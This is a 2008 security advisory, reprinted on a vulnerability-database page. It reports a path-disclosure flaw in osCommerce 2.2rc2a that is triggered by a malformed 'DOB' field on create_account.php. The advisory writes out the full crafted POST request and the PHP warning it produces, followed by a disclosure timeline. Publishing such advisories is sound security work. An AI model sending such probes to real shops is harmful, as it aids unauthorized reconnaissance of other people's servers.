Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20539
HistorySep 20, 2008 - 12:00 a.m.

[NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

2008-09-2000:00:00
vulners.com
14
JSON

Application: osCommerce 2.2rc2a
Authors Site: http://www.oscommerce.com/

±-------------------------------------------------------------+

Information Disclosure:

Manipulation of the 'DOB' Variable on create_account.php can cause
information disclosure:

In this example the POST variable 'DOB' has been set to: FOOBAR

POST /oscommerce/create_account.php

action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_addre
[email protected]&company=foobar&street_address=foobar&suburb=foobar&post
code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=1234
56789&newsletter=on&password=foobar&confirmation=foobar

Result:

Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80

±[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: None Yet
Author(s) Fix: None Yet

[email protected]

http://www.NoBytes.com

JSON